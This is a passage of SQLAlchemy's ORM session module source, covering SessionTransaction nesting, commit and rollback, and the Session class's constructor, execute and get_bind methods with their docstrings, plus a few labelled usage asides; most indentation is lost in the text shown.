:class:`.Session`. A :class:`.Session` that is in ``autocommit=False``
mode will create a new :class:`.SessionTransaction` to replace it
immediately, whereas a :class:`.Session` that's in ``autocommit=True``
mode will remain without a :class:`.SessionTransaction` until the
:meth:`.Session.begin` method is called.
Another detail of :class:`.SessionTransaction` behavior is that it is
capable of "nesting". This means that the :meth:`.Session.begin` method
can be called while an existing :class:`.SessionTransaction` is already
present, producing a new :class:`.SessionTransaction` that temporarily
replaces the parent :class:`.SessionTransaction`. When a
:class:`.SessionTransaction` is produced as nested, it assigns itself to
the :attr:`.Session.transaction` attribute. When it is ended via
:meth:`.Session.commit` or :meth:`.Session.rollback`, it restores its
parent :class:`.SessionTransaction` back onto the
:attr:`.Session.transaction` attribute. The behavior is effectively a
stack, where :attr:`.Session.transaction` refers to the current head of
the stack.
The purpose of this stack is to allow nesting of
:meth:`.Session.rollback` or :meth:`.Session.commit` calls in context
with various flavors of :meth:`.Session.begin`. This nesting behavior
applies to when :meth:`.Session.begin_nested` is used to emit a
SAVEPOINT transaction, and is also used to produce a so-called
"subtransaction" which allows a block of code to use a
begin/rollback/commit sequence regardless of whether or not its enclosing
code block has begun a transaction. The :meth:`.flush` method, whether
called explicitly or via autoflush, is the primary consumer of the
"subtransaction" feature, in that it wishes to guarantee that it works
within a transaction block regardless of whether or not the
:class:`.Session` is in transactional mode when the method is called.
See also:
:meth:`.Session.rollback`
:meth:`.Session.commit`
:meth:`.Session.begin`
:meth:`.Session.begin_nested`
:attr:`.Session.is_active`
:meth:`.SessionEvents.after_commit`
:meth:`.SessionEvents.after_rollback`
:meth:`.SessionEvents.after_soft_rollback`
"""
_rollback_exception = None
def __init__(self, session, parent=None, nested=False):
self.session = session
self._connections = {}
self._parent = parent
self.nested = nested
self._state = ACTIVE
if not parent and nested:
raise sa_exc.InvalidRequestError(
"Can't start a SAVEPOINT transaction when no existing "
"transaction is in progress")
if self.session._enable_transaction_accounting:
self._take_snapshot()
if self.session.dispatch.after_transaction_create:
self.session.dispatch.after_transaction_create(self.session, self)
@property
def is_active(self):
return self.session is not None and self._state is ACTIVE
def _assert_active(self, prepared_ok=False,
rollback_ok=False,
deactive_ok=False,
closed_msg="This transaction is closed"):
if self._state is COMMITTED:
raise sa_exc.InvalidRequestError(
"This session is in 'committed' state; no further "
"SQL can be emitted within this transaction."
)
elif self._state is PREPARED:
if not prepared_ok:
raise sa_exc.InvalidRequestError(
"This session is in 'prepared' state; no further "
"SQL can be emitted within this transaction."
)
elif self._state is DEACTIVE:
if not deactive_ok and not rollback_ok:
if self._rollback_exception:
raise sa_exc.InvalidRequestError(
"This Session's transaction has been rolled back "
"due to a previous exception during flush."
" To begin a new transaction with this Session, "
"first issue Session.rollback()."
" Original exception was: %s"
% self._rollback_exception
)
elif not deactive_ok:
raise sa_exc.InvalidRequestError(
"This Session's transaction has been rolled back "
"by a nested rollback() call. To begin a new "
"transaction, issue Session.rollback() first."
)
elif self._state is CLOSED:
raise sa_exc.ResourceClosedError(closed_msg)
@property
def _is_transaction_boundary(self):
return self.nested or not self._parent
def connection(self, bindkey, **kwargs):
self._assert_active()
bind = self.session.get_bind(bindkey, **kwargs)
return self._connection_for_bind(bind)
def _begin(self, nested=False):
self._assert_active()
return SessionTransaction(
self.session, self, nested=nested)
def _iterate_parents(self, upto=None):
if self._parent is upto:
return (self,)
else:
if self._parent is None:
raise sa_exc.InvalidRequestError(
"Transaction %s is not on the active transaction list" % (
upto))
return (self,) + self._parent._iterate_parents(upto)
def _take_snapshot(self):
if not self._is_transaction_boundary:
self._new = self._parent._new
self._deleted = self._parent._deleted
self._dirty = self._parent._dirty
self._key_switches = self._parent._key_switches
return
if not self.session._flushing:
self.session.flush()
self._new = weakref.WeakKeyDictionary()
self._deleted = weakref.WeakKeyDictionary()
self._dirty = weakref.WeakKeyDictionary()
self._key_switches = weakref.WeakKeyDictionary()
def _restore_snapshot(self, dirty_only=False):
assert self._is_transaction_boundary
for s in set(self._new).union(self.session._new):
self.session._expunge_state(s)
if s.key:
del s.key
for s, (oldkey, newkey) in self._key_switches.items():
self.session.identity_map.discard(s)
s.key = oldkey
self.session.identity_map.replace(s)
for s in set(self._deleted).union(self.session._deleted):
if s.deleted:
#assert s in self._deleted
del s.deleted
self.session._update_impl(s, discard_existing=True)
assert not self.session._deleted
for s in self.session.identity_map.all_states():
if not dirty_only or s.modified or s in self._dirty:
s._expire(s.dict, self.session.identity_map._modified)
def _remove_snapshot(self):
assert self._is_transaction_boundary
if not self.nested and self.session.expire_on_commit:
for s in self.session.identity_map.all_states():
s._expire(s.dict, self.session.identity_map._modified)
for s in self._deleted:
s.session_id = None
self._deleted.clear()
def _connection_for_bind(self, bind):
self._assert_active()
if bind in self._connections:
return self._connections[bind][0]
if self._parent:
conn = self._parent._connection_for_bind(bind)
if not self.nested:
return conn
else:
if isinstance(bind, engine.Connection):
conn = bind
if conn.engine in self._connections:
raise sa_exc.InvalidRequestError(
"Session already has a Connection associated for the "
"given Connection's Engine")
else:
conn = bind.contextual_connect()
if self.session.twophase and self._parent is None:
transaction = conn.begin_twophase()
elif self.nested:
transaction = conn.begin_nested()
else:
transaction = conn.begin()
self._connections[conn] = self._connections[conn.engine] = \
(conn, transaction, conn is not bind)
self.session.dispatch.after_begin(self.session, self, conn)
return conn
def prepare(self):
if self._parent is not None or not self.session.twophase:
raise sa_exc.InvalidRequestError(
"'twophase' mode not enabled, or not root transaction; "
"can't prepare.")
self._prepare_impl()
def _prepare_impl(self):
self._assert_active()
if self._parent is None or self.nested:
self.session.dispatch.before_commit(self.session)
stx = self.session.transaction
if stx is not self:
for subtransaction in stx._iterate_parents(upto=self):
subtransaction.commit()
if not self.session._flushing:
for _flush_guard in range(100):
if self.session._is_clean():
break
self.session.flush()
else:
raise exc.FlushError(
"Over 100 subsequent flushes have occurred within "
"session.commit() - is an after_flush() hook "
"creating new objects?")
if self._parent is None and self.session.twophase:
try:
for t in set(self._connections.values()):
t[1].prepare()
except:
with util.safe_reraise():
self.rollback()
self._state = PREPARED
def commit(self):
self._assert_active(prepared_ok=True)
if self._state is not PREPARED:
self._prepare_impl()
if self._parent is None or self.nested:
for t in set(self._connections.values()):
t[1].commit()
self._state = COMMITTED
self.session.dispatch.after_commit(self.session)
if self.session._enable_transaction_accounting:
self._remove_snapshot()
self.close()
return self._parent
def rollback(self, _capture_exception=False):
self._assert_active(prepared_ok=True, rollback_ok=True)
stx = self.session.transaction
if stx is not self:
for subtransaction in stx._iterate_parents(upto=self):
subtransaction.close()
if self._state in (ACTIVE, PREPARED):
for transaction in self._iterate_parents():
if transaction._parent is None or transaction.nested:
transaction._rollback_impl()
transaction._state = DEACTIVE
break
else:
transaction._state = DEACTIVE
sess = self.session
if self.session._enable_transaction_accounting and \
not sess._is_clean():
# if items were added, deleted, or mutated
# here, we need to re-restore the snapshot
util.warn(
"Session's state has been changed on "
"a non-active transaction - this state "
"will be discarded.")
self._restore_snapshot(dirty_only=self.nested)
self.close()
if self._parent and _capture_exception:
self._parent._rollback_exception = sys.exc_info()[1]
sess.dispatch.after_soft_rollback(sess, self)
return self._parent
def _rollback_impl(self):
for t in set(self._connections.values()):
t[1].rollback()
if self.session._enable_transaction_accounting:
self._restore_snapshot(dirty_only=self.nested)
self.session.dispatch.after_rollback(self.session)
def close(self):
self.session.transaction = self._parent
if self._parent is None:
for connection, transaction, autoclose in \
set(self._connections.values()):
if autoclose:
connection.close()
else:
transaction.close()
self._state = CLOSED
if self.session.dispatch.after_transaction_end:
self.session.dispatch.after_transaction_end(self.session, self)
if self._parent is None:
if not self.session.autocommit:
self.session.begin()
self.session = None
self._connections = None
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self._assert_active(deactive_ok=True, prepared_ok=True)
if self.session.transaction is None:
return
if type is None:
try:
self.commit()
except:
with util.safe_reraise():
self.rollback()
else:
self.rollback()
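# ---------------------------------------------------------------------------
# Illustrative aside, not part of the original module: the SAVEPOINT nesting
# behaviour documented on SessionTransaction above, seen from the public
# Session API. A sketch only; ``session`` is assumed to be an ORM Session
# bound to an engine and ``User`` an already-mapped class.
def _savepoint_usage_sketch(session, User):
    """Roll back only the inner unit of work while keeping the outer one."""
    session.add(User(name='outer'))
    try:
        with session.begin_nested():          # emits SAVEPOINT
            session.add(User(name='inner'))
            raise RuntimeError('undo only the inner work')
    except RuntimeError:
        pass                                  # SAVEPOINT rolled back; 'outer' kept
    session.commit()                          # commits the enclosing transaction
# ---------------------------------------------------------------------------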
class Session(_SessionClassMethods):
"""Manages persistence operations for ORM-mapped objects.
The Session's usage paradigm is described at :doc:`/orm/session`.
"""
public_methods = (
'__contains__', '__iter__', 'add', 'add_all', 'begin', 'begin_nested',
'close', 'commit', 'connection', 'delete', 'execute', 'expire',
'expire_all', 'expunge', 'expunge_all', 'flush', 'get_bind',
'is_modified',
'merge', 'query', 'refresh', 'rollback',
'scalar')
def __init__(self, bind=None, autoflush=True, expire_on_commit=True,
_enable_transaction_accounting=True,
autocommit=False, twophase=False,
weak_identity_map=True, binds=None, extension=None,
info=None,
query_cls=query.Query):
"""Construct a new Session.
See also the :class:`.sessionmaker` function which is used to
generate a :class:`.Session`-producing callable with a given
set of arguments.
:param autocommit:
.. warning::
The autocommit flag is **not for general use**, and if it is used,
queries should only be invoked within the span of a
:meth:`.Session.begin` / :meth:`.Session.commit` pair. Executing
queries outside of a demarcated transaction is a legacy mode
of usage, and can in some cases lead to concurrent connection
checkouts.
Defaults to ``False``. When ``True``, the
:class:`.Session` does not keep a persistent transaction running, and
will acquire connections from the engine on an as-needed basis,
returning them immediately after their use. Flushes will begin and
commit (or possibly rollback) their own transaction if no
transaction is present. When using this mode, the
:meth:`.Session.begin` method is used to explicitly start
transactions.
.. seealso::
:ref:`session_autocommit`
:param autoflush: When ``True``, all query operations will issue a
``flush()`` call to this ``Session`` before proceeding. This is a
convenience feature so that ``flush()`` need not be called
repeatedly in order for database queries to retrieve results. It's
typical that ``autoflush`` is used in conjunction with
``autocommit=False``. In this scenario, explicit calls to
``flush()`` are rarely needed; you usually only need to call
``commit()`` (which flushes) to finalize changes.
:param bind: An optional ``Engine`` or ``Connection`` to which this
``Session`` should be bound. When specified, all SQL operations
performed by this session will execute via this connectable.
:param binds: An optional dictionary which contains more granular
"bind" information than the ``bind`` parameter provides. This
dictionary can map individual ``Table`` instances as well as
``Mapper`` instances to individual ``Engine`` or ``Connection``
objects. Operations which proceed relative to a particular
``Mapper`` will consult this dictionary for the direct ``Mapper``
instance as well as the mapper's ``mapped_table`` attribute in
order to locate a connectable to use. The full resolution is
described in the ``get_bind()`` method of ``Session``.
Usage looks like::
Session = sessionmaker(binds={
SomeMappedClass: create_engine('postgresql://engine1'),
somemapper: create_engine('postgresql://engine2'),
some_table: create_engine('postgresql://engine3'),
})
Also see the :meth:`.Session.bind_mapper`
and :meth:`.Session.bind_table` methods.
:param \class_: Specify an alternate class other than
``sqlalchemy.orm.session.Session`` which should be used by the
returned class. This is the only argument that is local to the
``sessionmaker()`` function, and is not sent directly to the
constructor for ``Session``.
:param _enable_transaction_accounting: Defaults to ``True``. A
legacy-only flag which when ``False`` disables *all* 0.5-style
object accounting on transaction boundaries, including auto-expiry
of instances on rollback and commit, maintenance of the "new" and
"deleted" lists upon rollback, and autoflush of pending changes upon
begin(), all of which are interdependent.
:param expire_on_commit: Defaults to ``True``. When ``True``, all
instances will be fully expired after each ``commit()``, so that
all attribute/object access subsequent to a completed transaction
will load from the most recent database state.
:param extension: An optional
:class:`~.SessionExtension` instance, or a list
of such instances, which will receive pre- and post- commit and
flush events, as well as a post-rollback event. **Deprecated.**
Please see :class:`.SessionEvents`.
:param info: optional dictionary of arbitrary data to be associated
with this :class:`.Session`. Is available via the :attr:`.Session.info`
attribute. Note the dictionary is copied at construction time so
that modifications to the per-:class:`.Session` dictionary will be local
to that :class:`.Session`.
.. versionadded:: 0.9.0
:param query_cls: Class which should be used to create new Query
objects, as returned by the ``query()`` method. Defaults to
:class:`~sqlalchemy.orm.query.Query`.
:param twophase: When ``True``, all transactions will be started as
a "two phase" transaction, i.e. using the "two phase" semantics
of the database in use along with an XID. During a ``commit()``,
after ``flush()`` has been issued for all attached databases, the
``prepare()`` method on each database's ``TwoPhaseTransaction``
will be called. This allows each database to roll back the entire
transaction, before each transaction is committed.
:param weak_identity_map: Defaults to ``True`` - when set to
``False``, objects placed in the :class:`.Session` will be
strongly referenced until explicitly removed or the
:class:`.Session` is closed. **Deprecated** - this option
is obsolete.
"""
if weak_identity_map:
self._identity_cls = identity.WeakInstanceDict
else:
util.warn_deprecated("weak_identity_map=False is deprecated. "
"This feature is not needed.")
self._identity_cls = identity.StrongInstanceDict
self.identity_map = self._identity_cls()
self._new = {} # InstanceState->object, strong refs object
self._deleted = {} # same
self.bind = bind
self.__binds = {}
self._flushing = False
self._warn_on_events = False
self.transaction = None
self.hash_key = _new_sessionid()
self.autoflush = autoflush
self.autocommit = autocommit
self.expire_on_commit = expire_on_commit
self._enable_transaction_accounting = _enable_transaction_accounting
self.twophase = twophase
self._query_cls = query_cls
if info:
self.info.update(info)
if extension:
for ext in util.to_list(extension):
SessionExtension._adapt_listener(self, ext)
if binds is not None:
for mapperortable, bind in binds.items():
insp = inspect(mapperortable)
if insp.is_selectable:
self.bind_table(mapperortable, bind)
elif insp.is_mapper:
self.bind_mapper(mapperortable, bind)
else:
assert False
if not self.autocommit:
self.begin()
_sessions[self.hash_key] = self
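# ---------------------------------------------------------------------------
# Illustrative aside, not part of the original module: the constructor
# arguments documented above, exercised through sessionmaker. A sketch only;
# the in-memory SQLite URL is a placeholder.
def _session_factory_sketch():
    """Build a Session factory using the common constructor options."""
    from sqlalchemy import create_engine
    from sqlalchemy.orm import sessionmaker

    engine = create_engine('sqlite://')
    Session = sessionmaker(bind=engine,
                           autoflush=True,          # flush before each query
                           autocommit=False,        # keep a transaction open
                           expire_on_commit=True)   # expire state after commit()
    return Session()
# ---------------------------------------------------------------------------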
connection_callable = None
transaction = None
"""The current active or inactive :class:`.SessionTransaction`."""
@util.memoized_property
def info(self):
"""A user-modifiable dictionary.
The initial value of this dictionary can be populated using the
``info`` argument to the :class:`.Session` constructor or
:class:`.sessionmaker` constructor or factory methods. The dictionary
here is always local to this :class:`.Session` and can be modified
independently of all other :class:`.Session` objects.
.. versionadded:: 0.9.0
"""
return {}
def begin(self, subtransactions=False, nested=False):
"""Begin a transaction on this Session.
If this Session is already within a transaction, either a plain
transaction or nested transaction, an error is raised, unless
``subtransactions=True`` or ``nested=True`` is specified.
The ``subtransactions=True`` flag indicates that this
:meth:`~.Session.begin` can create a subtransaction if a transaction
is already in progress. For documentation on subtransactions, please
see :ref:`session_subtransactions`.
The ``nested`` flag begins a SAVEPOINT transaction and is equivalent
to calling :meth:`~.Session.begin_nested`. For documentation on
SAVEPOINT transactions, please see :ref:`session_begin_nested`.
"""
if self.transaction is not None:
if subtransactions or nested:
self.transaction = self.transaction._begin(
nested=nested)
else:
raise sa_exc.InvalidRequestError(
"A transaction is already begun. Use "
"subtransactions=True to allow subtransactions.")
else:
self.transaction = SessionTransaction(
self, nested=nested)
return self.transaction # needed for __enter__/__exit__ hook
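# ---------------------------------------------------------------------------
# Illustrative aside, not part of the original module: the ``subtransactions``
# flag documented on begin() above lets a helper use a begin/commit/rollback
# block whether or not its caller already started a transaction. A sketch
# only; ``session`` and ``obj`` are assumptions supplied by the caller.
def _subtransaction_sketch(session, obj):
    """Add ``obj`` inside a subtransaction-safe begin/commit/rollback block."""
    trans = session.begin(subtransactions=True)
    try:
        session.add(obj)
        trans.commit()    # flushes; commits to the database only at the outermost level
    except:
        trans.rollback()
        raise
# ---------------------------------------------------------------------------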
def begin_nested(self):
"""Begin a `nested` transaction on this Session.
The target database(s) must support SQL SAVEPOINTs or a
SQLAlchemy-supported vendor implementation of the idea.
For documentation on SAVEPOINT
transactions, please see :ref:`session_begin_nested`.
"""
return self.begin(nested=True)
def rollback(self):
"""Rollback the current transaction in progress.
If no transaction is in progress, this method is a pass-through.
This method rolls back the current transaction or nested transaction
regardless of subtransactions being in effect. All subtransactions up
to the first real transaction are closed. Subtransactions occur when
begin() is called multiple times.
.. seealso::
:ref:`session_rollback`
"""
if self.transaction is None:
pass
else:
self.transaction.rollback()
def commit(self):
"""Flush pending changes and commit the current transaction.
If no transaction is in progress, this method raises an
:exc:`~sqlalchemy.exc.InvalidRequestError`.
By default, the :class:`.Session` also expires all database
loaded state on all ORM-managed attributes after transaction commit.
This is so that subsequent operations load the most recent
data from the database. This behavior can be disabled using
the ``expire_on_commit=False`` option to :class:`.sessionmaker` or
the :class:`.Session` constructor.
If a subtransaction is in effect (which occurs when begin() is called
multiple times), the subtransaction will be closed, and the next call
to ``commit()`` will operate on the enclosing transaction.
When using the :class:`.Session` in its default mode of
``autocommit=False``, a new transaction will
be begun immediately after the commit, but note that the newly begun
transaction does *not* use any connection resources until the first
SQL is actually emitted.
.. seealso::
:ref:`session_committing`
"""
if self.transaction is None:
if not self.autocommit:
self.begin()
else:
raise sa_exc.InvalidRequestError("No transaction is begun.")
self.transaction.commit()
def prepare(self):
"""Prepare the current transaction in progress for two phase commit.
If no transaction is in progress, this method raises an
:exc:`~sqlalchemy.exc.InvalidRequestError`.
Only root transactions of two phase sessions can be prepared. If the
current transaction is not such, an
:exc:`~sqlalchemy.exc.InvalidRequestError` is raised.
"""
if self.transaction is None:
if not self.autocommit:
self.begin()
else:
raise sa_exc.InvalidRequestError("No transaction is begun.")
self.transaction.prepare()
def connection(self, mapper=None, clause=None,
bind=None,
close_with_result=False,
**kw):
"""Return a :class:`.Connection` object corresponding to this
:class:`.Session` object's transactional state.
If this :class:`.Session` is configured with ``autocommit=False``,
either the :class:`.Connection` corresponding to the current
transaction is returned, or if no transaction is in progress, a new
one is begun and the :class:`.Connection` returned (note that no
transactional state is established with the DBAPI until the first
SQL statement is emitted).
Alternatively, if this :class:`.Session` is configured with
``autocommit=True``, an ad-hoc :class:`.Connection` is returned
using :meth:`.Engine.contextual_connect` on the underlying
:class:`.Engine`.
Ambiguity in multi-bind or unbound :class:`.Session` objects can be
resolved through any of the optional keyword arguments. This
ultimately makes usage of the :meth:`.get_bind` method for resolution.
:param bind:
Optional :class:`.Engine` to be used as the bind. If
this engine is already involved in an ongoing transaction,
that connection will be used. This argument takes precedence
over ``mapper``, ``clause``.
:param mapper:
Optional :func:`.mapper` mapped class, used to identify
the appropriate bind. This argument takes precedence over
``clause``.
:param clause:
A :class:`.ClauseElement` (i.e. :func:`~.sql.expression.select`,
:func:`~.sql.expression.text`,
etc.) which will be used to locate a bind, if a bind
cannot otherwise be identified.
:param close_with_result: Passed to :meth:`Engine.connect`, indicating
the :class:`.Connection` should be considered "single use",
automatically closing when the first result set is closed. This
flag only has an effect if this :class:`.Session` is configured with
``autocommit=True`` and does not already have a transaction
in progress.
:param \**kw:
Additional keyword arguments are sent to :meth:`get_bind()`,
allowing additional arguments to be passed to custom
implementations of :meth:`get_bind`.
"""
if bind is None:
bind = self.get_bind(mapper, clause=clause, **kw)
return self._connection_for_bind(bind,
close_with_result=close_with_result)
def _connection_for_bind(self, engine, **kwargs):
if self.transaction is not None:
return self.transaction._connection_for_bind(engine)
else:
return engine.contextual_connect(**kwargs)
def execute(self, clause, params=None, mapper=None, bind=None, **kw):
"""Execute a SQL expression construct or string statement within
the current transaction.
Returns a :class:`.ResultProxy` representing
results of the statement execution, in the same manner as that of an
:class:`.Engine` or
:class:`.Connection`.
E.g.::
result = session.execute(
user_table.select().where(user_table.c.id == 5)
)
:meth:`~.Session.execute` accepts any executable clause construct, such
as :func:`~.sql.expression.select`,
:func:`~.sql.expression.insert`,
:func:`~.sql.expression.update`,
:func:`~.sql.expression.delete`, and
:func:`~.sql.expression.text`. Plain SQL strings can be passed
as well, which in the case of :meth:`.Session.execute` only
will be interpreted the same as if it were passed via a
:func:`~.expression.text` construct. That is, the following usage::
result = session.execute(
"SELECT * FROM user WHERE id=:param",
{"param":5}
)
is equivalent to::
from sqlalchemy import text
result = session.execute(
text("SELECT * FROM user WHERE id=:param"),
{"param":5}
)
The second positional argument to :meth:`.Session.execute` is an
optional parameter set. Similar to that of
:meth:`.Connection.execute`, whether this is passed as a single
dictionary, or a list of dictionaries, determines whether the DBAPI
cursor's ``execute()`` or ``executemany()`` is used to execute the
statement. An INSERT construct may be invoked for a single row::
result = session.execute(users.insert(), {"id": 7, "name": "somename"})
or for multiple rows::
result = session.execute(users.insert(), [
{"id": 7, "name": "somename7"},
{"id": 8, "name": "somename8"},
{"id": 9, "name": "somename9"}
])
The statement is executed within the current transactional context of
this :class:`.Session`. The :class:`.Connection` which is used
to execute the statement can also be acquired directly by
calling the :meth:`.Session.connection` method. Both methods use
a rule-based resolution scheme in order to determine the
:class:`.Connection`, which in the average case is derived directly
from the "bind" of the :class:`.Session` itself, and in other cases
can be based on the :func:`.mapper`
and :class:`.Table` objects passed to the method; see the documentation
for :meth:`.Session.get_bind` for a full description of this scheme.
The :meth:`.Session.execute` method does *not* invoke autoflush.
The :class:`.ResultProxy` returned by the :meth:`.Session.execute`
method is returned with the "close_with_result" flag set to true;
the significance of this flag is that if this :class:`.Session` is
autocommitting and does not have a transaction-dedicated
:class:`.Connection` available, a temporary :class:`.Connection` is
established for the statement execution, which is closed (meaning,
returned to the connection pool) when the :class:`.ResultProxy` has
consumed all available data. This applies *only* when the
:class:`.Session` is configured with autocommit=True and no
transaction has been started.
:param clause:
An executable statement (i.e. an :class:`.Executable` expression
such as :func:`.expression.select`) or string SQL statement
to be executed.
:param params:
Optional dictionary, or list of dictionaries, containing
bound parameter values. If a single dictionary, single-row
execution occurs; if a list of dictionaries, an
"executemany" will be invoked. The keys in each dictionary
must correspond to parameter names present in the statement.
:param mapper:
Optional :func:`.mapper` or mapped class, used to identify
the appropriate bind. This argument takes precedence over
``clause`` when locating a bind. See :meth:`.Session.get_bind`
for more details.
:param bind:
Optional :class:`.Engine` to be used as the bind. If
this engine is already involved in an ongoing transaction,
that connection will be used. This argument takes
precedence over ``mapper`` and ``clause`` when locating
a bind.
:param \**kw:
Additional keyword arguments are sent to :meth:`.Session.get_bind()`
to allow extensibility of "bind" schemes.
.. seealso::
:ref:`sqlexpression_toplevel` - Tutorial on using Core SQL
constructs.
:ref:`connections_toplevel` - Further information on direct
statement execution.
:meth:`.Connection.execute` - core level statement execution
method, which is :meth:`.Session.execute` ultimately uses
in order to execute the statement.
"""
clause = expression._literal_as_text(clause)
if bind is None:
bind = self.get_bind(mapper, clause=clause, **kw)
return self._connection_for_bind(bind, close_with_result=True).execute(
clause, params or {})
def scalar(self, clause, params=None, mapper=None, bind=None, **kw):
"""Like :meth:`~.Session.execute` but return a scalar result."""
return self.execute(
clause, params=params, mapper=mapper, bind=bind, **kw).scalar()
def close(self):
"""Close this Session.
This clears all items and ends any transaction in progress.
If this session were created with ``autocommit=False``, a new
transaction is immediately begun. Note that this new transaction does
not use any connection resources until they are first needed.
"""
self.expunge_all()
if self.transaction is not None:
for transaction in self.transaction._iterate_parents():
transaction.close()
def expunge_all(self):
"""Remove all object instances from this ``Session``.
This is equivalent to calling ``expunge(obj)`` on all objects in this
``Session``.
"""
for state in self.identity_map.all_states() + list(self._new):
state._detach()
self.identity_map = self._identity_cls()
self._new = {}
self._deleted = {}
# TODO: need much more test coverage for bind_mapper() and similar !
# TODO: + crystalize + document resolution order
# vis. bind_mapper/bind_table
def bind_mapper(self, mapper, bind):
"""Bind operations for a mapper to a Connectable.
mapper
A mapper instance or mapped class
bind
Any Connectable: an ``Engine`` or ``Connection``.
All subsequent operations involving this mapper will use the given
`bind`.
"""
if isinstance(mapper, type):
mapper = class_mapper(mapper)
self.__binds[mapper.base_mapper] = bind
for t in mapper._all_tables:
self.__binds[t] = bind
def bind_table(self, table, bind):
"""Bind operations on a Table to a Connectable.
table
A ``Table`` instance
bind
Any Connectable: an ``Engine`` or ``Connection``.
All subsequent operations involving this ``Table`` will use the
given `bind`.
"""
self.__binds[table] = bind
def get_bind(self, mapper=None, clause=None):
"""Return a "bind" to which this :class:`.Session` is bound.
The "bind" is usually an instance of :class:`.Engine`,
except in the case where the :class:`.Session` has been
explicitly bound directly to a :class:`.Connection`.
For a multiply-bound or unbound :class:`.Session`, the
``mapper`` or ``clause`` arguments are used to determine the
appropriate bind to return.
Note that the "mapper" argument is usually present
when :meth:`.Session.get_bind` is called via an ORM
operation such as a :meth:`.Session.query`, each
individual INSERT/UPDATE/DELETE operation within a
:meth:`.Session.flush` call, etc.
The order of resolution is:
1. if mapper given and session.binds is present,
locate a bind based on mapper.
2. if clause given and session.binds is present,
locate a bind based on :class:`.Table` objects
found in the given clause present in session.binds.
3. if session.bind is present, return that.
4. if clause given, attempt to return a bind
linked to the :class:`.MetaData` ultimately
associated with the clause.
5. if mapper given, attempt to return a bind
linked to the :class:`.MetaData` ultimately
associated with the :class:`.Table` or other
selectable to which the mapper is mapped.
6. No bind can be found, :exc:`~sqlalchemy.exc.UnboundExecutionError`
is raised.
:param mapper:
Optional :func:`.mapper` mapped class or instance of
:class:`.Mapper`. The bind can be derived from a :class:`.Mapper`
first by consulting the "binds" map associated with this
:class:`.Session`, and secondly by consulting the :class:`.MetaData`
associated with the :class:`.Table` to which the :class:`.Mapper`
is mapped for a bind.
:param clause:
A :class:`.ClauseElement` (i.e. :func:`~.sql.expression.select`,
:func:`~.sql.expression.text`,
etc.). If the ``mapper`` argument is not present or could not
produce a bind, the given expression construct will be searched
for a bound element, typically a :class:`.Table` associated with
bound :class:`.MetaData`.
"""
if mapper is clause is None:
if self.bind:
return self.bind
else:
raise sa_exc.UnboundExecutionError(
"This session is not bound to a single Engine or "
"Connection, and no context was provided to locate "
"a binding.")
c_mapper = mapper is not None and _class_to_mapper(mapper) or None
# manually bound?
if self.__binds:
if c_mapper:
if c_mapper.base_mapper in self.__binds:
return self.__binds[c_mapper.base_mapper]
elif c_mapper.mapped_table in self.__binds:
return self.__binds[c_mapper.mapped_table]
if clause is not None:
for t in sql_util.find_tables(clause, include_crud=True):
if t in self.__binds:
return self.__binds[t]
if self.bind:
return self.bind
if isinstance(clause, sql.expression.ClauseElement) and clause.bind:
return clause.bind
if c_mapper and c_mapper.mapped_table.bind:
return c_mapper.mapped_table.bind
context = []
if mapper is not None:
context.append('mapper %s' % c_mapper)
if clause is not None:
context.append('SQL expression')
raise sa_exc.UnboundExecutionError(
"Could not locate a bind configured on %s or this Session" % (
', '.join(context)))
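# ---------------------------------------------------------------------------
# Illustrative aside, not part of the original module: the resolution order
# documented on get_bind() above, driven from user code via the ``binds`` map.
# A sketch only; ``User`` is assumed to be a mapped class, ``log_table`` a
# Table object, and the SQLite URLs are placeholders.
def _multi_bind_sketch(User, log_table):
    """Route ORM work on ``User`` and raw SQL against ``log_table`` to
    different engines, as consulted by get_bind() steps 1 and 2."""
    from sqlalchemy import create_engine
    from sqlalchemy.orm import sessionmaker

    users_engine = create_engine('sqlite://')
    logs_engine = create_engine('sqlite://')
    Session = sessionmaker(binds={User: users_engine,       # step 1: by mapper
                                  log_table: logs_engine})  # step 2: by table
    session = Session()
    assert session.get_bind(mapper=User) is users_engine
    assert session.get_bind(clause=log_table.select()) is logs_engine
    return session
# ---------------------------------------------------------------------------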
def query(self, *entities, **kwargs):
"""Return a new ``Query`` object corresponding to this ``Session``."""
return self._query_cls(entities, self, **kwargs)
@property
@util.contextmanager
def no_autoflush(self):
"""Return a context manager that disables autoflush.
e.g.::
with session.no_autoflush:
some_object = SomeClass()
session.add(some_object)
# won't autoflush
some_object.related_thing = session.query(SomeRelated).first()
Operations that proceed within the ``with:`` block
will not be subject to flushes occurring upon query
access. This is useful when initializing a series
of objects which involve existing database queries,
where the uncompleted object should not yet be flushed.
.. versionadded:: 0.7.6
"""
autoflush = self.autoflush
self.autoflush = False
yield self
self.autoflush = autoflush
def _autoflush(self):
if self.autoflush and not self._flushing:
self.flush()
def refresh(self, instance, attribute_names=None, lockmode=None):
"""Expire and refresh the attributes on the given instance.
A query will be issued to the database and all attributes will be
refreshed with their current database value.
Lazy-loaded relational attributes will remain lazily loaded, so that
the instance-wide refresh operation will be followed immediately by
the lazy load of that attribute.
Eagerly-loaded relational attributes will eagerly load within the
single refresh operation.
Note that a highly isolated transaction will return the same values as
were previously read in that same transaction, regardless of changes
in database state outside of that transaction - usage of
:meth:`~Session.refresh` usually only makes sense if non-ORM SQL
statements were emitted in the ongoing transaction, or if autocommit
mode is turned on.
:param attribute_names: optional. An iterable collection of
string attribute names indicating a subset of attributes to
be refreshed.
:param lockmode: Passed to the :class:`~sqlalchemy.orm.query.Query`
as used by :meth:`~sqlalchemy.orm.query.Query.with_lockmode`.
"""
try:
state = attributes.instance_state(instance)
except exc.NO_STATE:
raise exc.UnmappedInstanceError(instance)
self._expire_state(state, attribute_names)
if loading.load_on_ident(
self.query(object_mapper(instance)),
state.key, refresh_state=state,
lockmode=lockmode,
only_load_props=attribute_names) is None:
raise sa_exc.InvalidRequestError(
"Could not refresh instance '%s'" %
instance_str(instance))
def expire_all(self):
"""Expires all persistent instances within this Session.
When any attribute on a persistent instance is next accessed,
a query will be issued using the
:class:`.Session` object's current transactional context in order to
load all expired attributes for the given instance. Note that
a highly isolated transaction will return the same values as were
previously read in that same transaction, regardless of changes
in database state outside of that transaction.
To expire individual objects and individual attributes
on those objects, use :meth:`Session.expire`.
The :class:`.Session` object's default behavior is to
expire all state whenever the :meth:`Session.rollback`
or :meth:`Session.commit` methods are called, so that new
state can be loaded for the new transaction. For this reason,
calling :meth:`Session.expire_all` should not be needed when
autocommit is ``False``, assuming the transaction is isolated.
"""
for state in self.identity_map.all_states():
state._expire(state.dict, self.identity_map._modified)
def expire(self, instance, attribute_names=None):
